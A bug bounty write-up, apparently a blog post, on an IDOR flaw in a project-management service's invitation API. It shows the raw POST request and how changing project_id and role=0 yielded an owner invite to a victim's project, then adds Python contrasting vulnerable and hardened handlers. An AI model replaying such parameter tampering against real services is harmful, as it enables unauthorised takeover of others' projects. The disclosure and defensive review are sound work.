IDOR Leads To Project Takeover

Hariharan.s
Jun 9, 2019 · 1 min read

It's all about Changes

Hi Guys,

This is my second bug bounty write-up, on how I managed to take over a victim's project using the collaboration invite.

redacted.com runs an online project management service where people can post comments, images, files, etc. about their work in a single project. The admin of a project can add users as collaborators of the project.

The collaboration invite request looked like this:

POST /project_api/project_invitation HTTP/1.1
Host: redacted.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://redacted.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 121
Connection: close

x_token=748f5bba976e3a202a7dbfa939271cde11e260fa52b7bbe4f3a024d80d08df92&project_id=5401234&role=1&emails=test%40test.com

And when I saw the request I thought: what if I...

So we have three request parameters of interest:

project_id=

role=

emails=

I changed the request to:

project_id= the victim's project ID

role=0 (0=Owner, 1=Editor)

emails= my email

I forwarded the request and...

I checked my inbox and there it was: a collaboration invite to the victim's project as an owner. I was able to edit, delete, add more users, remove the original owner of the project, etc.
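To make the root cause concrete, here is an added example (my own toy model, not the vendor's code) of what the invitation endpoint was doing versus what it should do. The server took project_id and role straight from the request and never checked that the logged-in user owns that project, so anyone could mint an owner invite for any project ID. The hardened version looks the project up, requires the requester to hold the owner role on it, rejects unknown role values, and returns the same error for "no such project" and "not your project" so the endpoint cannot be used to enumerate IDs. The Project/Invitation classes, user names, e-mail addresses and the owner-only invite policy are assumptions made for this demo; the role ids (0=Owner, 1=Editor) and the project ID are the ones from the write-up.

```python
"""Toy model of the project_invitation endpoint: vulnerable vs. hardened.
Added example, not the vendor's code. User names, e-mail addresses and the
in-memory data model are constructed for the demo."""
from dataclasses import dataclass, field

OWNER, EDITOR = 0, 1            # role ids as described in the write-up: 0=Owner, 1=Editor
KNOWN_ROLES = {OWNER, EDITOR}


@dataclass
class Project:
    project_id: int
    members: dict = field(default_factory=dict)  # user_id -> role


@dataclass
class Invitation:
    project_id: int
    email: str
    role: int


class InviteService:
    def __init__(self, projects):
        self.projects = {p.project_id: p for p in projects}
        self.outbox = []  # invitations that would be e-mailed out

    def invite_vulnerable(self, requester, project_id, role, emails):
        """The bug: project_id and role are trusted as sent by the client.
        Nothing ties `requester` (the logged-in user) to `project_id`, and
        the client may ask for any role, including owner."""
        if project_id not in self.projects:
            raise LookupError("no such project")
        for email in emails:
            self.outbox.append(Invitation(project_id, email, role))
        return len(emails)

    def invite_secure(self, requester, project_id, role, emails):
        """Authorization is decided server-side from the session user and
        the project's membership table, not from request parameters."""
        project = self.projects.get(project_id)
        requester_role = project.members.get(requester) if project else None
        # One response for "missing" and "not yours": no ID enumeration oracle.
        if requester_role != OWNER:          # assumption: only owners may invite
            raise PermissionError("not allowed")
        if role not in KNOWN_ROLES:
            raise ValueError("unknown role")
        for email in emails:
            self.outbox.append(Invitation(project_id, email, role))
        return len(emails)


def demo():
    """Replays the write-up's attack against both handlers and reports the outcome."""
    svc = InviteService([Project(5401234, {"victim": OWNER})])  # victim's project
    out = {}
    # attacker is not a member of 5401234 but requests an owner invite to their own address
    out["vulnerable"] = svc.invite_vulnerable("attacker", 5401234, OWNER, ["attacker@example.com"])
    out["vulnerable_role"] = svc.outbox[-1].role
    try:
        svc.invite_secure("attacker", 5401234, OWNER, ["attacker@example.com"])
        out["secure_attacker"] = "allowed"
    except PermissionError:
        out["secure_attacker"] = "denied"
    # the real owner can still invite an editor through the hardened handler
    out["secure_owner"] = svc.invite_secure("victim", 5401234, EDITOR, ["colleague@example.com"])
    return out


if __name__ == "__main__":
    print(demo())
```

When reviewing an endpoint like this, the question to ask is "which server-side fact connects the caller to the object ID in the request?" If the only answer is "none", every parameter that names an object (project_id) or a privilege (role) is attacker-controlled. Granting the owner role to someone else is also a large enough step that many products handle it as a separate ownership-transfer flow with its own confirmation rather than through the ordinary invite endpoint.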

And I was like...

I immediately reported the bug and received a good 3-digit bounty :)
